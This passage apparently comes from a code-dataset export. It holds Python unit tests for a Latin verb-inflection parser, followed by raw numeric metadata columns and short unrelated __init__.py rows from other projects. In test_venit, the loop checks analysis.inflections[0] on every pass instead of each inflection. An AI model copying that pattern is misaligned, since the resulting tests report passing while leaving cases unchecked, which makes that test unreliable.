            "amat", "am", "am", "at",
            {
                "Mood": Mood.IND,
                "Number": Number.S,
                "Person": Person["3"],
                "Tense": Tense.PRES,
                "Voice": Voice.ACTIVE,
            },
        )

    def test_quaero(self):
        self._check_single_inflection(
            "quaerebar", "quaer", "quaer", "ebar",
            {
                "Mood": Mood.IND,
                "Number": Number.S,
                "Person": Person["1"],
                "Tense": Tense.IMPF,
                "Voice": Voice.PASSIVE,
            },
        )

    def test_tulisti(self):
        # Suppletive verb: lexeme root is "fer" but the perfect stem is "tul".
        self._check_single_inflection(
            "tulisti", "fer", "tul", "isti",
            {
                "Mood": Mood.IND,
                "Number": Number.S,
                "Person": Person["2"],
                "Tense": Tense.PERF,
                "Voice": Voice.ACTIVE,
            },
        )

    def test_amavisse(self):
        self._check_single_inflection(
            "amavisse", "am", "amav", "isse",
            {
                "Mood": Mood.INF,
                "Number": Number.X,
                "Person": Person["0"],
                "Tense": Tense.PERF,
                "Voice": Voice.ACTIVE,
            },
        )

    def test_abiri(self):
        self._check_single_inflection(
            "abiri", "abe", "abi", "ri",
            {
                "Mood": Mood.INF,
                "Number": Number.X,
                "Person": Person["0"],
                "Tense": Tense.PRES,
                "Voice": Voice.PASSIVE,
            },
        )

    def test_decet(self):
        self._check_single_inflection(
            "decet", "dec", "dec", "et",
            {
                "Mood": Mood.IND,
                "Number": Number.S,
                "Person": Person["3"],
                "Tense": Tense.PRES,
                "Voice": Voice.ACTIVE,
            },
        )

    def test_alit(self):
        # "alit" yields two analyses, both from the same lexeme "al" and
        # both with the same single inflection.
        self._check_single_inflection(
            "alit", "al", "al", "it",
            {
                "Mood": Mood.IND,
                "Number": Number.S,
                "Person": Person["3"],
                "Tense": Tense.PRES,
                "Voice": Voice.ACTIVE,
            },
            analyses=2,
        )

    def test_venit(self):
        # "venit" is ambiguous between two different lexemes ("vene" and
        # "veni"), so each analysis is checked per root and the shared
        # helper does not apply.
        result = self.par.parse("venit")
        self.assertEqual(len(result.forms), 1)
        self.assertEqual(len(result.forms[0].analyses), 2)
        for analysis in result.forms[0].analyses.values():
            self.assertEqual(analysis.lexeme.wordType, WordType.V)
            if analysis.lexeme.roots[0] == "vene":
                # venere, venio = to be sold as a slave
                self.assertEqual(len(analysis.inflections), 1)
                expected_features = {
                    "Mood": Mood.IND,
                    "Number": Number.S,
                    "Person": Person["3"],
                    "Tense": Tense.PRES,
                    "Voice": Voice.ACTIVE,
                }
                self.assertEqual(analysis.inflections[0].stem, "veni")
                self.assertEqual(analysis.inflections[0].affix, "t")
                self.assertEqual(analysis.inflections[0].wordType, WordType.V)
                self.assertEqual(analysis.inflections[0].features,
                                 expected_features)
            elif analysis.lexeme.roots[0] == "veni":
                # Two inflections: present and perfect coincide in form.
                self.assertEqual(len(analysis.inflections), 2)
                for inflection in analysis.inflections:
                    self.assertEqual(analysis.inflections[0].stem, "ven")
                    self.assertEqual(analysis.inflections[0].affix, "it")
                    self.assertEqual(analysis.inflections[0].wordType,
                                     WordType.V)
                    self.assertTrue(inflection.has_feature(Mood.IND))
                    self.assertTrue(inflection.has_feature(Number.S))
                    self.assertTrue(inflection.has_feature(Person["3"]))
                    self.assertTrue(inflection.has_feature(Voice.ACTIVE))
                other_features = [x.features["Tense"]
                                  for x in analysis.inflections]
                self.assertTrue(Tense.PRES in other_features)
                self.assertTrue(Tense.PERF in other_features)
            else:
                self.fail("Invalid root")
| 45.178218
| 85
| 0.585141
| 945
| 9,126
| 5.615873
| 0.112169
| 0.211984
| 0.216695
| 0.224232
| 0.876013
| 0.810251
| 0.750141
| 0.746938
| 0.746938
| 0.725834
| 0
| 0.014495
| 0.289393
| 9,126
| 201
| 86
| 45.402985
| 0.803855
| 0.024764
| 0
| 0.609195
| 0
| 0
| 0.040603
| 0
| 0
| 0
| 0
| 0
| 0.465517
| 1
| 0.051724
| false
| 0.011494
| 0.017241
| 0
| 0.074713
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
0b735f175b94591aedb43cb089d7a0f138df40ce
| 204
|
py
|
Python
|
pygns3/__init__.py
|
mvdwoord/PyGNS3
|
e44f57be97f01e5a41fd1847860a5a78b5754790
|
[
"MIT"
] | 9
|
2017-08-11T09:31:42.000Z
|
2020-03-31T12:59:16.000Z
|
pygns3/__init__.py
|
mvdwoord/PyGNS3
|
e44f57be97f01e5a41fd1847860a5a78b5754790
|
[
"MIT"
] | 3
|
2019-02-22T13:28:34.000Z
|
2019-09-09T16:15:20.000Z
|
pygns3/__init__.py
|
mvdwoord/PyGNS3
|
e44f57be97f01e5a41fd1847860a5a78b5754790
|
[
"MIT"
] | 7
|
2017-10-05T18:25:13.000Z
|
2021-06-28T10:23:18.000Z
|
from .controller import GNS3API, GNS3Compute, GNS3Controller, GNS3Project, GNS3VM
from requests.auth import HTTPBasicAuth
__all__ = ['GNS3API', 'GNS3Compute', 'GNS3Controller', 'GNS3Project', 'GNS3VM']
| 34
| 81
| 0.784314
| 19
| 204
| 8.210526
| 0.631579
| 0.230769
| 0.410256
| 0.551282
| 0.628205
| 0
| 0
| 0
| 0
| 0
| 0
| 0.054645
| 0.102941
| 204
| 5
| 82
| 40.8
| 0.797814
| 0
| 0
| 0
| 0
| 0
| 0.241379
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0b82614e97ecb670905d909e626237b61a660a2e
| 86
|
py
|
Python
|
processor/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 74
|
2021-04-19T03:09:45.000Z
|
2022-03-29T06:32:08.000Z
|
processor/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 16
|
2021-05-14T06:09:26.000Z
|
2022-02-23T20:08:27.000Z
|
processor/__init__.py
|
RichardDominik/AICITY2021_Track2_DMT
|
50f27363532ae712868ff1ceaf128a3bbec426ac
|
[
"MIT"
] | 18
|
2021-05-10T02:17:01.000Z
|
2022-03-27T05:18:55.000Z
|
from .processor import do_train, do_inference
from .uda_processor import do_uda_train
| 28.666667
| 45
| 0.860465
| 14
| 86
| 4.928571
| 0.5
| 0.434783
| 0.492754
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.104651
| 86
| 2
| 46
| 43
| 0.896104
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.